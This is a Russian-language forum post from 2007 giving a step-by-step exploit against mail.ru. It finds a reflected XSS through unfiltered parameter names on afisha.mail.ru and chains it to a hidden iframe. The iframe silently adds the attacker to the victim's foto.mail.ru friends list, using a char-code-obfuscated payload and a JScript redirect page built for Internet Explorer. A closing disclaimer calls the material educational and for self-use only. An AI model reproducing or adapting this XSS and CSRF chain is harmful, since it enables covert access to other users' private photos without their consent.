LeverOne
15.07.2007, 20:36
они иногда блокируются(не отображаются)
5. Это верно. Такой способ не сработает, например, в IE.
Известная причина тому - невозможность загрузить во фрейм страницу другого сайта, имеющую ограничения по доступу только для авторизованного пользователя.
Все, что нам нужно сделать для обхода, это найти банальную пассивную ХSS и прописать код с ее учетом. ХSS в данном случае поможет нам выполнить отправку запроса непосредственно внутри домена.
Демонстрация.
1) пассивную на мыл ру иногда бывает интересно поискать только с целью обхода фильтрации. Например
http://afisha.mail.ru/events.html?cd=1&placetype=2
Фильтрация имеется в обоих параметрах полей гет-запроса (то, что идет после cd= и placetype= ).
location.href='?city='+city_c+'&placetype=2%3Clo%3E';
Но если мы проверим фильтрацию в самих названиях полей.
http://afisha.mail.ru/events.html?cd=1&placetype<lo>=2
ее там не окажется, :D и вы увидите что-то типа
location.href='?city='+city_c+'&placetype<lo>=2';
Следовательно, xss примет вид
http://afisha.mail.ru/events.html?cd=1&placetype</script><script>alert(/lo/)</script>=2
2) часть скрипта, отправляющая внутридоменный запрос на добавление вас в список избранных, будет выглядеть по-прежнему также, но добавляем обработчик загрузки фрейма, чтобы быть уверенными, что запрос на фото.майл.ру отправлен (второй вариант, - использование settimeout(), - менее предпочтителен, на мой взгляд)
[PHP]<iframe src=http://my.foto.mail.ru/cgi-bin/friends?email=twoemilo%40mail.ru&type=1&add=1 width=0 height=0 border=0 onload=document.location.href='http://twoisait.ru/1_.html';></iframe>
кодируем все вместе в Char
String.fromCharCode(60,105,102,114,97,109,101,32,1 15,114,99,61,104,116,116,112,58,47,47,109,121,46,1 02,111,116,111,46,109,97,105,108,46,114,117,47,99, 103,105,45,98,105,110,47,102,114,105,101,110,100,1 15,63,101,109,97,105,108,61,116,119,111,101,109,10 5,108,111,37,52,48,109,97,105,108,46,114,117,38,11 6,121,112,101,61,49,38,97,100,100,61,49,32,119,105 ,100,116,104,61,48,32,104,101,105,103,104,116,61,4 8,32,98,111,114,100,101,114,61,48,32,111,110,108,1 11,97,100,61,100,111,99,117,109,101,110,116,46,108 ,111,99,97,116,105,111,110,46,104,114,101,102,61,3 9,104,116,116,112,58,47,47,116,119,111,105,115,97, 105,116,46,114,117,47,49,95,46,104,116,109,108,39, 59,62,60,47,105,102,114,97,109,101,62)
3) собираем сплойт, который будет висеть на странице нашего сайта и ссылку на которую будем давать юзеру. При этом указываем язык - JScript, чтобы заточить сплойт под IE. JScript будет понятен только IE.
<script language="JScript">document.location.href='http://afisha.mail.ru/events.html?cd=1&placetype\'}<\/script><script>document.write(String.fromCharCode(60,105,102,114, 97,109,101,32,115,114,99,61,104,116,116,112,58,47, 47,109,121,46,102,111,116,111,46,109,97,105,108,46 ,114,117,47,99,103,105,45,98,105,110,47,102,114,10 5,101,110,100,115,63,101,109,97,105,108,61,116,119 ,111,101,109,105,108,111,37,52,48,109,97,105,108,4 6,114,117,38,116,121,112,101,61,49,38,97,100,100,6 1,49,32,119,105,100,116,104,61,48,32,104,101,105,1 03,104,116,61,48,32,98,111,114,100,101,114,61,48,3 2,111,110,108,111,97,100,61,100,111,99,117,109,101 ,110,116,46,108,111,99,97,116,105,111,110,46,104,1 14,101,102,61,39,104,116,116,112,58,47,47,116,119, 111,105,115,97,105,116,46,114,117,47,49,95,46,104, 116,109,108,39,59,62,60,47,105,102,114,97,109,101, 62))<\/script>=2';</script>
Пихаем это на свою страницу вместе с кодом, где используется один ифрейм (см. пост выше). Когда пользователь заходит по ссылке на вашу страницу (1.html - напр), его перебрасывает на страницу маиловского поддомена, на которой открывается нулевой ифрейм со страницей фото.майл. Выполняется внутридоменный запрос, что разрешено IE. Потом юзера снова перебрасывает на ваш сайт (1_.html), где вы можете разместить, что вы ему обещали.
Под IE имеется побочный эффект: на некоторое время будет мелькать страница с xss, что обычно не вызывает подозрений.
Отличия и преимущества этого метода от кражи кук очевидны - не нужно ничего ждать, кроме того, даже если у юзера стоит привязка куков к айпи и запрет одновременных сессий, этот способ все равно подойдет.
П.С.
Если у вас уже ничего не работает, взгляните на дату этого поста - "вчера" это уже "вчера", а полгода назад это вообще смешно. :D
_________________________________
Под словами "вы", "мы" и "юзер" я понимаю одних и тех же людей! Используйте этот способ только для добавления СЕБЯ в свой список избранных! Предупреждение: использование описанного способа для просмотра чужих фотографий, получения доступа к иным конфиденциальным сведениям является уголовно наказуемым деянием. Автор не несет никакой ответственности за использование данного материала в противозаконных целях другими лицами. Вся информация представлена в ознакомительных целях. Форма изложения диктуется сугубо художественным замыслом наиболее удобного для восприятия изложения мысли.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot